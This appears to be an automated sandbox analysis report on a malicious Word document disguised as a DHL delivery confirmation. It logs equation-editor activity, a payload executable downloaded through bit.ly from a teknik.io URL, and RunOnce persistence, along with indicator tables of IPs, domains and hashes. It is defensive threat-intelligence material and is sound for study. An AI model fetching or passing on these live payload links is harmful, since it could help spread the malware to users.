Simulations

Behavior and APIs

Time	Type	Description
07:41:32	API Interceptor	46x Sleep call for process: EQNEDT32.EXE modified
07:43:30	API Interceptor	70x Sleep call for process: 69577.exe modified
07:43:33	API Interceptor	212x Sleep call for process: RegAsm.exe modified
07:43:35	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\subfolder1\filename1.exe
07:43:43	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Startup key C:\Users\user\subfolder1\filename1.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
67.199.248.11	purchase order_2242021.doc	Get hash	malicious	Browse	bit.ly/3qO7045
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse	bit.ly/3kijui1
	QUOTE.doc	Get hash	malicious	Browse	bit.ly/2P3CMwd
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	bit.ly/2ZElo32
	SWIFT Payment W0301.doc	Get hash	malicious	Browse	bit.ly/3dyLFYN
	Quotation408S_A02021_AHYAN_group_of_companies.doc	Get hash	malicious	Browse	bit.ly/2OMPBuy
	YOUR PRODUCT.doc	Get hash	malicious	Browse	bit.ly/2LVhrUo
	Invoice.doc	Get hash	malicious	Browse	bit.ly/3amsMGn
	Purchase order.doc	Get hash	malicious	Browse	bit.ly/3qm8NNO
	IMG_04779.doc	Get hash	malicious	Browse	bit.ly/3dffBt0
	INV00004423.doc	Get hash	malicious	Browse	bit.ly/3aLXmrV
	PO_Scanned_06387.doc	Get hash	malicious	Browse	bit.ly/3rwUfef
	IMG_Scanned_3062.doc	Get hash	malicious	Browse	bit.ly/2YXPr5o
	INV00004423.doc	Get hash	malicious	Browse	bit.ly/2MvEzt1
	DTBT760087673.doc	Get hash	malicious	Browse	bit.ly/3arM6Rr
	IMG_59733.doc	Get hash	malicious	Browse	bit.ly/3rf1U0L
	IMG_804941.doc	Get hash	malicious	Browse	bit.ly/3cyMT5V
	IMG_0916.doc	Get hash	malicious	Browse	bit.ly/3pFy7y3
	SOA 2.doc	Get hash	malicious	Browse	bit.ly/3cxhzEz
	Quotation Ref FP-299318.doc	Get hash	malicious	Browse	bit.ly/3anMC2V
5.79.72.163	QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Get hash	malicious	Browse
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Get hash	malicious	Browse
	QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Get hash	malicious	Browse
	purchase order_2242021.doc	Get hash	malicious	Browse
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse
	PO AAN2102002-V020.doc	Get hash	malicious	Browse
	PO55004.doc	Get hash	malicious	Browse
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse
	RFQ Document.doc	Get hash	malicious	Browse
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc	Get hash	malicious	Browse
	Quotation408S_A02021_AHYAN_group_of_companies.doc	Get hash	malicious	Browse
	tcwO1bua5E.exe	Get hash	malicious	Browse
	87e8ff5c51e0.xls	Get hash	malicious	Browse
	Request for Quote_SEKOLAH TUNAS BAKTI SG.doc__.rtf	Get hash	malicious	Browse
	hvEUyC1xKe.exe	Get hash	malicious	Browse
	NEW_QUOTATION_mp20201126_Quotation_20P6200829_sup_mpjxPriceInquiry_1606406420424.doc	Get hash	malicious	Browse
	Purchase Order.doc	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
bit.ly	QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Get hash	malicious	Browse	67.199.248.11
	CsmBq6KLHu.doc	Get hash	malicious	Browse	67.199.248.11
	purchase order_2242021.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	67.199.248.11
	PO55004.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	RFQ Document.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	67.199.248.10
	Order.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTE.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	67.199.248.10
	swift payment.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_61061_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11
	IMG_6078_SCANNED.doc	Get hash	malicious	Browse	67.199.248.11

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LEASEWEB-NL-AMS-01NetherlandsNL	QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Get hash	malicious	Browse	5.79.72.163
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Get hash	malicious	Browse	5.79.72.163
	QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Get hash	malicious	Browse	5.79.72.163
	purchase order_2242021.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	5.79.72.163
	PO55004.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	RFQ Document.doc	Get hash	malicious	Browse	5.79.72.163
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	5.79.72.163
	SecuriteInfo.com.Trojan.PackedNET.540.1271.exe	Get hash	malicious	Browse	213.227.154.188
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	5.79.72.163
	MV9tCJw8Xr.exe	Get hash	malicious	Browse	5.79.70.250
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCK.doc	Get hash	malicious	Browse	5.79.72.163
	Quotation408S_A02021_AHYAN_group_of_companies.doc	Get hash	malicious	Browse	5.79.72.163
	Request For Quotation.PDF.exe	Get hash	malicious	Browse	212.32.237.101
	PO#652.exe	Get hash	malicious	Browse	5.79.87.207
	Parcel _009887 .exe	Get hash	malicious	Browse	212.32.237.92
	PO 20211602.xlsm	Get hash	malicious	Browse	82.192.82.225
GOOGLE-PRIVATE-CLOUDUS	QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTATION44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc	Get hash	malicious	Browse	67.199.248.10
	CsmBq6KLHu.doc	Get hash	malicious	Browse	67.199.248.11
	Details van vereiste.pps	Get hash	malicious	Browse	67.199.248.16
	purchase order_2242021.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909yy.doc	Get hash	malicious	Browse	67.199.248.11
	Offerte aanvragen 22-02-2021.ppt	Get hash	malicious	Browse	67.199.248.16
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	PO AAN2102002-V020.doc	Get hash	malicious	Browse	67.199.248.10
	PO55004.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	RFQ Document.doc	Get hash	malicious	Browse	67.199.248.10
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909_RAW.doc	Get hash	malicious	Browse	67.199.248.10
	Order.doc	Get hash	malicious	Browse	67.199.248.10
	QUOTE.doc	Get hash	malicious	Browse	67.199.248.11
	DHL88700456XXXX_CONFIRMATION_BOOKING_REFERENCE_BJC400618092909.doc	Get hash	malicious	Browse	67.199.248.10
	IMG_57109_Scanned.doc	Get hash	malicious	Browse	67.199.248.10
	Deadly Variants of Covid 19.doc	Get hash	malicious	Browse	67.199.248.10
	swift payment.doc	Get hash	malicious	Browse	67.199.248.10

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	893
Entropy (8bit):	7.366016576663508
Encrypted:	false
SSDEEP:	24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
MD5:	D4AE187B4574036C2D76B6DF8A8C1A30
SHA1:	B06F409FA14BAB33CBAF4A37811B8740B624D9E5
SHA-256:	A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
SHA-512:	1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	0..y...H.........j0..f...1.0....H.........N0..J0..2.......D....'..09...@k0....H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0....H.............0..........P..W..be......,k0.[...}.@......3vI.?!I..N..>H.e...!.e..2....w..{........s.z..2..~..0....8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i.....)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0....H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..\|.Wv..(9..e...w.j..w.......)...55.1.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.080958610796429
Encrypted:	false
SSDEEP:	6:kKPNTbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:n83kPlE99SNxAhUeo+aKt
MD5:	3153EE9142F518D2502D6B92B807F980
SHA1:	74A75BA200BA02D0829B9D0F6A857AF6563082D9
SHA-256:	6BFF454EC161F620AD1E7458534B16CC283F5FCAE9FE8D3452FB4DF150E7904B
SHA-512:	9980461133E270B5CB72D672B3916EB470C80B58C4E5D7B268BD9573094FCACBCF99022F89D193447E1B553F51E00266FC2487276DAED5A93D8C7CD9420FE5BC
Malicious:	false
Reputation:	low
Preview:	p...... ........;.b.....(....................................................... ..................&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.e.b.b.a.e.1.d.7.e.a.d.6.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	3.0012753651362942
Encrypted:	false
SSDEEP:	3:kkFkl9tJllXfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kKKliBAIdQZV7eAYLit
MD5:	04B3526E130549B5D299094FCDC4781C
SHA1:	10A69B5132DE8D10EF770AE2DF9C6FDD43F6DC7F
SHA-256:	42E3768F8863EE8834571E090A894BB2C0EA922F4AFA68A71F2F4B129527D226
SHA-512:	8DBDEED72DF50EE6CA903F38F9D01A123AB95044476CD6E109B5C33E6AB45629FA9A0D04D6E3CC83B7094C9549C9D9D1F327CB4059A2613E017BBDA407668D10
Malicious:	false
Reputation:	low
Preview:	p...... ....`...t($.....(....................................................... ........u.........(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.9.e.7.6.b.3.c.6.4.b.c.0."...

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\WLjtp[1].txt Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	131072
Entropy (8bit):	4.850477304732314
Encrypted:	false
SSDEEP:	3072:0wVUPE99xL9eKvb1HIFb5JjS0TqiAoQqwV:0wVUPEfDewb1HIFb5JjSyqiNQqwV
MD5:	8181B7DAAD3D822BE5A16DD3CB6F9065
SHA1:	1A52DF36955ADDF3EA3DEC85AD89F13AC267CC48
SHA-256:	936AF5883F7175DD1B3EC862E66ACB7B6670154FC7B5F93DABD4B9788F2279D1
SHA-512:	41F93D0AC3F4DD9FE4B88C2AA308A08AA79D4DD624B04D21E68B25A6B0CB39E429F61ED22E599AD24B3B396F05EF1A6E9E3DD121A02618FFA6BD811982CCC994
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 27%
Reputation:	low
IE Cache URL:	https://u.teknik.io/WLjtp.txt
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.....0...~..0......0...Rich1...........PE..L....=.T.................P...................`....@..........................................................................U..(....p.....................................................................(... ....................................text....I.......P.................. ..`.data........`.......`..............@....rsrc.......p.......p..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\2NYVK6q[1].htm Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	116
Entropy (8bit):	4.542691692257488
Encrypted:	false
SSDEEP:	3:qVvzLURODccZ/vXbvx9nDyZHL+kpIIkFSXbKFvNGb:qFzLIeco3XLx92ZHqzIMSLWQb
MD5:	1D4CEF789A9D088F38B8BEE0111E73E3
SHA1:	59F7A1ADE6455AFC532706F535BA7352C561E698
SHA-256:	11FBBE5E31BAB9015123DC0975EA7BBD024C3D51F935D3A30980437A8A4E0791
SHA-512:	87E13B9CBCF6D56E8CE0E0A47CFA6FBAD9B7605FF9645E919CF542F492D1B3881A89474CAF53941229AC77ED799BEC9009453CC5CA81178FEC559CB0292CEAE5
Malicious:	false
Reputation:	low
Preview:	<html>.<head><title>Bitly</title></head>.<body><a href="https://u.teknik.io/WLjtp.txt">moved here</a></body>.</html>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{03EBD8D7-10B9-4A25-A35B-CDE7E003844A}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1536
Entropy (8bit):	1.3586208805849453
Encrypted:	false
SSDEEP:	3:Iiiiiiiiiif3l/Hlnl/bl//l/bllBl/PvvvvvvvvvvFl/l/lAqsalHl3lldHzlbp:IiiiiiiiiifdLloZQc8++lsJe1Mzen
MD5:	28F40716A36BEFF5FB2150E1FE5BD3AB
SHA1:	08031E0C0F4166BFC0C8C4C8464FD547D117A024
SHA-256:	EA3899F1D1E80B5AC3C72D696CBB2F9E1AA07EC4372C1E6B27922C45117BABAA
SHA-512:	F5AB0C170443A9E5220EA090A463A46E7166C89438A01B7827ED8FE52EA279EBE6212EF7C91F0FE7B59A77CB7A7FB6275AFE154B76C01688B200E63C0D2E577E
Malicious:	false
Reputation:	low
Preview:	..(...(...(...(...(...(...(...(...(...(...(...A.l.b.u.s...A........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................."...&...*.......:...>...............................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{0EAA91A7-30AB-4901-9D2A-3CE504568F55}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{F7C72BCE-A594-453E-90B7-97C10E531855}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	2722266
Entropy (8bit):	4.1428003820879775
Encrypted:	false
SSDEEP:	12288:T6KsftPPovopME6KsftQPovopME6KsfBQPovopME0KsftQPovopMz6KsftQPovol:INZzgN+5NgNhN+ZlJNJNZNsw3Gj
MD5:	0B898ED5582DAF2954A8F2D26BAAF9BE
SHA1:	2B594A3E3A68D2E84DEEC3248D1C5458745D91F1
SHA-256:	1EDEABE3746F9C2FA26909DA7E311D6AB7FFEF74D7A7C50660C112EA6BC068E5
SHA-512:	F5A62E378A213CAF23E7C0A06C5469D2427B8B6F068729A5E6495296145673E80A125C772CD88991D2A318D008EB1E11CBA5725518DA53825C476C1BE5BB6637
Malicious:	false
Preview:	..@.m.4.2.J.E.U.a.4.S.r.c.l.Z.j.j.E.@.-.K.I.2.W.T.Y.r.C.C.I.Y.w.a.u.Z.0.C.<.e.h.&.&.7._.M.-.C._.D.-.-._.-.V.,.6.4.>.8.8.9.6.4.$.C.v.>.y.t.=.n.6.\|.:.%._.>.j.n.8.%.b.m.;.=.u...1.4..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . . . . ..... . . . . . . . . . . . . . . . . . . . ......... . . . . . . . . . . . . . . . . . . . . ............. . . . . . . . . . . . . .

C:\Users\user\AppData\Local\Temp\Cab81DE.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	Microsoft Cabinet archive data, 59134 bytes, 1 file
Category:	dropped
Size (bytes):	59134
Entropy (8bit):	7.995450161616763
Encrypted:	true
SSDEEP:	1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5:	E92176B0889CC1BB97114BEB2F3C1728
SHA1:	AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256:	58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512:	CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious:	false
Preview:	MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7I.....e..Y..Rq...3.n..u..............\|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b.....[...L..c..a..,...E5X..i.d..w.....#o+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.

C:\Users\user\AppData\Local\Temp\Tar81DF.tmp Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.316654432555028
Encrypted:	false
SSDEEP:	1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
MD5:	64FEDADE4387A8B92C120B21EC61E394
SHA1:	15A2673209A41CCA2BC3ADE90537FE676010A962
SHA-256:	BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
SHA-512:	655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DHL_ DELIVERY_ PICKUP _CONFIRMATION_CBJ200618092901.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Wed Aug 26 14:08:13 2020, atime=Thu Feb 25 14:41:30 2021, length=1410843, window=hide
Category:	dropped
Size (bytes):	2438
Entropy (8bit):	4.624567627086575
Encrypted:	false
SSDEEP:	24:8LT/XTwz6IknCIEEefS1EwDv3qFdM7dD2LT/XTwz6IknCIEEefS1EwDv3qFdM7dV:8LT/XT3IkiEUvFQh2LT/XT3IkiEUvFQ/
MD5:	9E0754E1CA713E498BF38C7B45B5FF09
SHA1:	2D4E37B20C532B599742F51BCB504246C93618C1
SHA-256:	661D3CD28EB8679051670F79A2757E92AE11A36E7D9FED3F646CC5DC3C64FEDD
SHA-512:	697148F2A417A2D0FF64F197B85E50007B6DE66E7AB9DCE84C9C89E81D0FF1504AA6B8CF144EBA3F16067698C477D3FDEB484C512544E6A28DE15BDD7A718C6A
Malicious:	false
